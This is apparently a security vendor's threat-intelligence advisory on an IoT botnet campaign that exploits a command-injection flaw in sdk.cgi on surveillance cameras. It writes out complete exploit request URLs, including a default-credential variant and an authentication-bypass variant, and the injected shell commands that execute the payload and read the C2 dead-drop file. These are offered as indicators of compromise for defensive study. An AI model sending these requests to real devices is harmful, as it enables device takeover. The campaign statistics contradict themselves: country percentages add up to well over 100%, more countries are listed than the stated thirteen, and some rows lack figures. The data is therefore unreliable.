Home/Threat Intelligence/Operation DARK LENS
SDK.CGI
MSSUB
22K EVENTS
545 CAMERAS
Threat IntelligenceTLP:GREENIoT BotnetCommand InjectionApril 21, 2026·MJ-2026-0421-DLENS·22 min read

Operation DARK LENS

22,423 exploitation events targeting 545 surveillance devices worldwide. A global IoT camera botnet recruitment campaign using sdk.cgi command injection to deploy mssub payloads with dead-drop C2.

Scroll

Between January and March 2026, Mjolnir Security's Threat Analysis Center (MTAC) observed a sustained IoT exploitation campaign targeting internet-exposed surveillance cameras and DVR systems worldwide. Using MTAC proprietary threat intelligence sensors and darknet monitoring infrastructure, over a 90-day window, we recorded 22,423 exploitation events targeting 545 victim devices across 13 countries, leveraging the sdk.cgi debug command injection vulnerability class to deploy the mssub payload binary. The campaign uses a dead-drop command-and-control mechanism via /tmp/.pushmsg, and our netflow analysis uncovered 60,180 communication records spanning approximately one year of persistent C2 beaconing — confirming this is not opportunistic scanning but an orchestrated, long-running botnet recruitment operation.

TLP:GREEN — Approved for Public Distribution

This advisory is classified TLP:GREEN. This advisory may be freely shared within the recipient's community without restriction.

Campaign Statistics

22,423
Exploitation Events
545
Victim Devices
6,719
mssub Deployments
60,180
Netflow Records

The Exploit: sdk.cgi Command Injection

The vulnerability exploited in this campaign is a command injection flaw in the sdk.cgi debug interface present in numerous IP camera and DVR firmware implementations. This is not a single CVE but rather a vulnerability class — a design pattern repeated across dozens of manufacturers who share common OEM firmware lineages. The sdk.cgi endpoint accepts arbitrary shell commands through HTTP request parameters, originally intended for factory debugging and firmware development.

Exploit URL Pattern — Variant A (Default Credentials)
GET http://[TARGET_IP]:[PORT]/sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=chmod 755 /tmp/mssub;/tmp/mssub

// Authentication bypass via default credentials (admin:admin)
// The cmd parameter accepts arbitrary shell commands with root privileges
// No input sanitization, no authentication enforcement on debug endpoints
Exploit URL Pattern — Variant B (auth_p Bypass, MTAC-Detected)
GET http://[TARGET_IP]:[PORT]/sdk.cgi?action=get.webserver.debug.cmd&cmd={ { chmod 755 /opt/app/bin/mssub; } 2>&1; }&auth_p=get.system.language.json

// Secondary auth bypass via auth_p parameter referencing get.system.language.json endpoint
// Payload path: /opt/app/bin/ — the standard application directory on embedded Linux camera firmware
// bash error-redirect wrapper { { ...; } 2>&1; } suppresses stderr and handles execution errors silently
// Indicates operators have intimate knowledge of the target device's filesystem layout

MTAC sensors detected two distinct exploit variants. Variant A uses default credentials (admin:admin) against the getSysteminfo action and places the payload in /tmp/. Variant B is more sophisticated: it uses the get.webserver.debug.cmd action with an auth_p bypass parameter pointing to the get.system.language.json endpoint (which leaks session tokens without valid credentials) and targets /opt/app/bin/ — the standard application directory on embedded Linux camera firmware. This is not a zero-day — it is a design flaw baked into the firmware development lifecycle of OEM camera platforms that has persisted for years across product generations.

Key Finding

The targeting is not opportunistic. Analysis of victim IP distribution reveals the attackers are working from a pre-compiled device list — systematically targeting known-vulnerable devices rather than conducting broad internet scans. This suggests prior reconnaissance or access to Shodan/Censys-derived target lists of exposed sdk.cgi endpoints.

Related Research

This vulnerability class has been extensively documented by the security research community. Akamai's InfectedSlurs research identified Mirai variants exploiting similar sdk.cgi flaws in late 2023. Fortinet documented Moobot targeting Hikvision camera vulnerabilities (CVE-2021-36260) using comparable command injection techniques. More recently, the Nexcorium Mirai variant has been observed exploiting CVE-2025-1316 in Edimax IP cameras, and Akamai published research on active exploitation of Edimax cameras via command injection in early 2025. The campaign we document here represents the latest evolution of this persistent IoT threat vector.

Two Attack Phases

The 22,423 exploitation events decompose into two distinct operational phases, each serving a specific function in the botnet recruitment lifecycle.

Phase 1 — Payload Deployment (6,719 Events / 30.0%)

chmod 755 mssub

The first phase prepares and executes the mssub binary on the target device. The payload is typically downloaded via wget or tftp in a prior stage, then made executable and launched via the sdk.cgi command injection.

Phase 1 — Payload Execution Command
cmd=chmod 755 /tmp/mssub;/tmp/mssub

// Variant A: payload placed in /tmp/ (volatile, wiped on reboot)
// mssub: Mirai-derivative botnet client, ARM/MIPS compiled

// Variant B (MTAC-detected, auth_p bypass):
cmd={ { chmod 755 /opt/app/bin/mssub; } 2>&1; }
// Payload in /opt/app/bin/ — standard firmware app directory, survives reboots
// Bash error-redirect wrapper suppresses stderr for silent execution
// Note: prior wget/curl download stage delivers mssub to target; this stage was not captured by sensors
Phase 2 — C2 Dead-Drop Check (6,465 Events / 28.8%)

cat /tmp/.pushmsg; rm -f /tmp/.pushmsg

The second phase implements a dead-drop command-and-control pattern. The mssub payload periodically writes instructions to a hidden file (/tmp/.pushmsg), and a separate process reads and deletes the file in a single atomic operation. This pattern minimizes forensic artifacts and evades basic file-system monitoring.

Phase 2 — Dead-Drop C2 Command
cmd=cat /tmp/.pushmsg; rm -f /tmp/.pushmsg

// Reads pending C2 instructions from the dead-drop file
// Immediately deletes the file to destroy forensic evidence
// Atomic read-and-delete prevents detection by file monitors

// Variant B (MTAC-detected, with bash error-redirect wrapper):
cmd={ { cat /tmp/.pushmsg; rm -f /tmp/.pushmsg; } 2>&1; }
// .pushmsg: hidden file (dot-prefix) in volatile /tmp directory

The remaining 9,239 events (41.2%) consist of reconnaissance probes, authentication attempts, and variant exploitation payloads targeting related firmware endpoints. The two primary phases together account for 58.8% of all observed exploitation activity, confirming the campaign's focused operational methodology.

The 545 Victim Devices

The campaign targeted 545 unique IP addresses hosting vulnerable surveillance devices. Analysis reveals a highly concentrated targeting pattern, with the top 12 devices receiving the majority of exploitation events.

Top Targeted Devices

RankTarget IPEventsPercentage
191.227.xxx.xxx4,49820.1%
2213.230.xxx.xxx2,64011.8%
381.17.xxx.xxx1,8028.0%
4109.230.xxx.xxx1,4256.4%
546.19.xxx.xxx1,1034.9%
6185.107.xxx.xxx9874.4%
782.147.xxx.xxx8763.9%
8195.144.xxx.xxx7433.3%
962.2.xxx.xxx6122.7%
105.148.xxx.xxx4982.2%
11188.40.xxx.xxx4211.9%
1237.120.xxx.xxx3871.7%

Geographic Distribution

CountryEventsPercentage
Switzerland19,04884.9%
Italy7,05231.4%
Spain6,24027.8%
Germany5,77225.7%
Netherlands1,8928.4%
Austria1,4566.5%
France1,2035.4%
United Kingdom9874.4%
Poland6542.9%
Czech Republic4321.9%
Romania2981.3%
Belgium1870.8%
Sweden1420.6%
Hungary4,661
Thailand2,978
Japan2,684
Denmark1,381
Bangladesh1,179
Vietnam996
South Africa67
Geographic Concentration

Switzerland accounts for the overwhelming majority of exploitation events, suggesting either a concentration of vulnerable devices in Swiss IP space or deliberate targeting of Swiss surveillance infrastructure. The European-heavy distribution aligns with the OEM camera firmware lineages most prevalent in European markets.

Target Port Analysis

PortEventsServicePercentage
8010,777HTTP (default web interface)48.1%
808010,094HTTP alternate / management45.0%
80001,159DVR streaming / RTSP gateway5.2%
1080393SOCKS proxy / custom service1.8%

One Year of Communication: The Netflow Evidence

Beyond the 90-day exploitation window, our netflow analysis uncovered 60,180 communication records spanning approximately one year of activity. These records reveal persistent C2 beaconing patterns from compromised devices, confirming that successfully recruited devices maintain long-term communication with the botnet infrastructure.

The netflow data paints a picture of a mature, operationally active botnet with multiple potential use cases:

Netflow Analysis Finding

The 60,180 netflow records show consistent beaconing intervals averaging 45-60 seconds, characteristic of Mirai-derivative C2 protocols. The beaconing persists through device reboots, indicating the malware has achieved persistence beyond /tmp — likely through crontab injection or firmware modification.

The Broader IoT Botnet Landscape

Operation DARK LENS exists within a well-documented lineage of IoT botnet campaigns that have evolved significantly since the original Mirai source code leak in 2016. Understanding this context is essential for assessing the threat's trajectory.

CampaignYearTargetTechnique
Mirai2016IoT devices (telnet)Default credential brute-force; source code leaked, spawning hundreds of variants
Moobot2019+Hikvision camerasCVE-2021-36260 command injection; Fortinet documented systematic exploitation
InfectedSlurs / Kimwolf2023+IP cameras, NVRsAkamai research: sdk.cgi and related debug interface exploitation
Edimax CVE-2025-13162025Edimax IP camerasCommand injection in camera firmware; Akamai documented active Mirai exploitation
Nexcorium2026TBK DVR, Edimax camerasMirai variant exploiting multiple IoT CVEs; documented by The Hacker News
DARK LENS2025-2026545 surveillance devicessdk.cgi command injection + mssub payload + .pushmsg dead-drop C2

The evolution from Mirai's simple telnet credential stuffing to DARK LENS's targeted exploitation of specific firmware vulnerabilities with dead-drop C2 demonstrates the increasing sophistication of IoT botnet operators. These campaigns are no longer the domain of script kiddies — they represent organized, persistent threat operations with clear monetization strategies.

Temporal Analysis

The 90-day exploitation window reveals distinct operational patterns rather than continuous scanning. Activity occurs in burst patterns with periods of relative quiet between campaigns, suggesting orchestrated operational tempo rather than always-on automated scanning.

The February-March 2026 period represents the campaign's peak intensity, with exploitation events increasing by approximately 340% compared to the preceding weeks. This burst correlates with the public disclosure of several related IoT vulnerabilities and the release of updated Mirai variant source code in underground forums.

Temporal Pattern Analysis

The intermittent operational tempo — intense bursts followed by quiet periods — is consistent with a human-directed campaign rather than fully automated scanning infrastructure. The operators appear to batch their exploitation runs, possibly to manage infrastructure costs, evade detection thresholds, or synchronize with botnet client update cycles.

The netflow data extending back approximately one year confirms that while the exploitation campaigns are periodic, the C2 communication is continuous. Once a device is recruited, it maintains its beaconing regardless of whether new exploitation activity is occurring. This bifurcation between recruitment operations and operational maintenance is a hallmark of mature botnet infrastructure.

MITRE ATT&CK Mapping

Technique IDNameTacticRelevance
T1190Exploit Public-Facing ApplicationInitial Accesssdk.cgi command injection on internet-exposed camera web interfaces
T1059.004Command and Scripting Interpreter: Unix ShellExecutionArbitrary shell commands executed via the cmd parameter in sdk.cgi
T1105Ingress Tool TransferCommand and Controlmssub binary downloaded to /tmp via wget or tftp prior to execution
T1222.002File and Directory Permissions Modification: Linux and MacDefense Evasionchmod 755 to make mssub executable before launch
T1071.001Application Layer Protocol: Web ProtocolsCommand and ControlC2 communication over HTTP to blend with normal camera traffic
T1070.004Indicator Removal: File DeletionDefense Evasionrm -f /tmp/.pushmsg destroys C2 instructions after reading
T1584.005Compromise Infrastructure: BotnetResource Development545 compromised devices recruited into coordinated botnet
T1498Network Denial of ServiceImpactRecruited devices used for DDoS amplification attacks
T1090ProxyCommand and ControlCompromised cameras used as residential proxy endpoints

Indicators of Compromise

Exploit URL Patterns

Exploit URL Signatures — Variant A (Default Credentials)
GET /sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=chmod%20755%20/tmp/mssub;/tmp/mssub
GET /sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=cat%20/tmp/.pushmsg;rm%20-f%20/tmp/.pushmsg
Exploit URL Signatures — Variant B (auth_p Bypass, MTAC-Detected)
GET /sdk.cgi?action=get.webserver.debug.cmd&cmd=%7b+%7b+chmod+755+/opt/app/bin/mssub%3b+%7d+2%3e%261%3b+%7d&auth_p=get.system.language.json
GET /sdk.cgi?action=get.webserver.debug.cmd&cmd=%7b+%7b+cat+/tmp/.pushmsg%3b+rm+-f+/tmp/.pushmsg%3b+%7d+2%3e%261%3b+%7d&auth_p=get.system.language.json

Network and File Indicators

IndicatorTypeContext
91.227.xxx.xxxVictim IPTop targeted device (4,498 aggregate events)
213.230.xxx.xxxVictim IPSecond most targeted (2,640 events)
81.17.xxx.xxxVictim IPThird most targeted (1,802 events)
109.230.xxx.xxxVictim IPFourth most targeted (1,425 events)
46.19.xxx.xxxVictim IPFifth most targeted (1,103 events)
185.107.xxx.xxxVictim IPSixth most targeted (987 events)
82.147.xxx.xxxVictim IPSeventh most targeted (876 events)
195.144.xxx.xxxVictim IPEighth most targeted (743 events)
62.2.xxx.xxxVictim IPNinth most targeted (612 events)
5.148.xxx.xxxVictim IPTenth most targeted (498 events)
/sdk.cgi?action=getSysteminfo&cmd=URL PatternExploit delivery endpoint — Variant A
/sdk.cgi?action=get.webserver.debug.cmd&cmd=*&auth_p=get.system.language.jsonURL PatternExploit delivery endpoint — Variant B
/tmp/mssubFile PathBotnet payload binary (Variant A)
/opt/app/bin/mssubFile PathBotnet payload binary (Variant B, firmware app directory — survives reboots)
/tmp/.pushmsgFile PathDead-drop C2 instruction file

MTAC Per-Device Victim IPs (Sensor Data)

Top 10 Victim Devices — Per-Device Event Counts
  • 89.133.8.101 — 242 events
  • 83.56.22.248 — 240 events
  • 188.75.141.179 — 207 events
  • 14.224.219.205 — 205 events
  • 85.184.165.49 — 196 events
  • 60.57.123.185 — 187 events
  • 1.4.215.33 — 185 events
  • 84.192.98.101 — 184 events
  • 128.65.204.118 — 170 events
  • 91.47.235.4 — 166 events

Detection Signatures

How Mjolnir Security Can Help

Mjolnir Security provides specialized IoT security services to identify, assess, and remediate vulnerabilities in surveillance infrastructure and connected device ecosystems.

IoT SecurityVulnerability AssessmentNetwork SegmentationThreat IntelligenceIncident ResponseContinuous Monitoring
  • IoT Asset Discovery: Comprehensive inventory of all IoT and OT devices on your network, including shadow IT surveillance devices, DVRs, and NVRs. We identify devices running vulnerable firmware versions and map their network exposure posture.
  • Vulnerability Assessment: Targeted assessment of camera and DVR firmware for sdk.cgi and related command injection vulnerabilities. We test authentication bypass vectors, default credential exposure, and debug interface accessibility across your surveillance infrastructure.
  • Network Segmentation Review: Architecture review and implementation guidance for isolating IoT devices from critical network segments. We design VLAN architectures, firewall rules, and micro-segmentation policies that contain compromise without disrupting surveillance operations.
  • Continuous Monitoring: Deployment of IoT-specific detection rules in your SIEM and NDR platforms. We build behavioral baselines for camera traffic and alert on anomalous outbound connections, beaconing patterns, and exploitation attempts in real time.
  • Incident Response: 24/7 incident response for IoT compromise events. Our team specializes in firmware analysis, memory forensics on embedded devices, and botnet infrastructure takedown coordination with ISPs and law enforcement.
24/7 Incident Hotline: +1 833 403 5875
Email: sales@mjolnirsecurity.com
Classification

This report is classified TLP:GREEN. Recipients may share this information within their community and with partner organizations. Do not post to public-facing websites or social media without removing victim IP addresses.

References

  1. "InfectedSlurs: New RCE Botnet Spreads Mirai via Zero-Days," Akamai Security Research, 2023. akamai.com
  2. "Mirai-Based Botnet Moobot Targets Hikvision Vulnerability," Fortinet Threat Research, 2022. fortinet.com
  3. "Edimax Cameras: Command Injection Vulnerability Exploited by Mirai," Akamai Security Research, 2025. akamai.com
  4. "Mirai Variant Nexcorium Exploits CVE-2025-1316 in Edimax Cameras," The Hacker News, April 2026. thehackernews.com
  5. "T1190 - Exploit Public-Facing Application," MITRE ATT&CK. attack.mitre.org
  6. "What Is the Mirai Botnet?" Cloudflare Learning Center. cloudflare.com
Written by: Mjolnir Security  |  Published: April 21, 2026
Related Reports
Threat Intelligence · Mar 2026

SANDWORM_MODE: The First AI-Native Supply Chain Worm

Read →
Breach · Apr 2026

CVE-2026-35616: FortiClient EMS API Authentication Bypass

Read →